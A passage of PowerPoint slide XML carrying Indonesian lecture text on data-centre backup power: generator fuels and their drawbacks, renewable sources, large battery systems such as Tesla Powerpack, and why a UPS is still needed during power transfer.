              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Generator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Generator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>listrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gedung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seringkali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Sebagian </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> generator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> diesel, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>propana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> gas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bakar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> diesel dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>propana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utamanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (diesel juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> masa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>simpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 18 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bulan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> gas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalahnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Adalah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasokan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> gas yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diandalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Pusat data juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berinvestasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbarukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tenaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>surya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>angin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bumi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bakar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hidrogen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan air. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tenaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbarukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>faktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbaik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Solusi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baterai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berskala</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Powerpack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Tesla (tesla.com/powerpack), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alternatif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> generator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>listrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ada juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baterai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> microgrid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (https://www.scientificamerican.com/ article/bagaimana-baterai-besar-di-pusat-data-dapat-menggantikan-pembangkit-listrik/).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. UPS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>selalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dibutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> generator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>cadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> online </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>cukup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>merespons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. Daya generator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dimasukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sakelar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> transfer yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>beroperasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> manual </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. UPS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>berukuran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>menangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>selama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> proses transfer</a:t>
            </a:r>
          </a:p>
          <a:p>
